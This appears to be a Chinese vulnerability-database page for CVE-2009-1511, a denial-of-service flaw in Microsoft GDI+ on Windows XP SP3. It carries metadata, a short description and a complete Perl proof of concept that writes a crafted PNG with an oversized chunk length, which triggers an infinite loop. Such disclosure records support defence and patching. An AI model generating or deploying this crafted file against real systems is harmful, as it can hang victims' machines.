Microsoft GDI+ Plugin PNG File 无线循环拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117607 漏洞类型 资源管理错误
发布时间 2009-04-17 更新时间 2009-05-04
CVE编号 CVE-2009-1511 CNNVD-ID CNNVD-200905-032
漏洞平台 Windows CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/8466
https://cxsecurity.com/issue/WLB-2009050103
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-032
|漏洞详情
Windows是Microsoft公司开发的图形用户界面操作系统,是目前最为普遍使用的个人计算机系统部署的操作系统。MicrosoftWindowsXPSP3版本的GDI+允许远程攻击者可以借助一个包含某一超大的btChunkLen值的PNG文件,造成拒绝服务(无限循环)。
|漏洞EXP
#! /usr/bin/perl
#CAL_gdiplug_poc.pl
#
# Mircosoft_gdiplug_png_infinity_loop_D.o.S POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
# 
#Affected
#========
#test on full updated winxp sp3
#other version should be affected
#
#CVE: please assign to a CVE number
#
#DESCRIPTION
#===========
#
#  The vulnerability exists within the code in MicroSoft Gdi+ processing crafted png file. that cause infinity loop to cause high CPU(100%) and D.o.S . 
#
#
#ANALYSIS
#========
#
#  png chunk
#
# {
#	DWORD btChunkLen;
#	CHAR btChunkType[4];
#} CHUNK_HEADER;

#if btChunkLen is 0xfffffff4, would cause code fall into infinity loop
#

open(Fin, ">poc.png") || die "can't create crash sample.$!";
binmode(Fin);
$data = 
"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52" .
"\x00\x00\x03\x00\x00\x00\x04\x00\x08\x02\x00\x00\x00\xd9\x44\xa9" .
"\x57\xff\xff\xff\xf4\x41\x41\x41\x41\x62\x01\x08\xcb\x06\x49\x3e" .
"\xd7\x0a\x00\x22\xe3\xf1\x32\x3e\xe8";

print Fin $data;

close(Fin);

# milw0rm.com [2009-04-17]
|参考资料

来源:BID
名称:34586
链接:http://www.securityfocus.com/bid/34586
来源:MILW0RM
名称:8466
链接:http://www.milw0rm.com/exploits/8466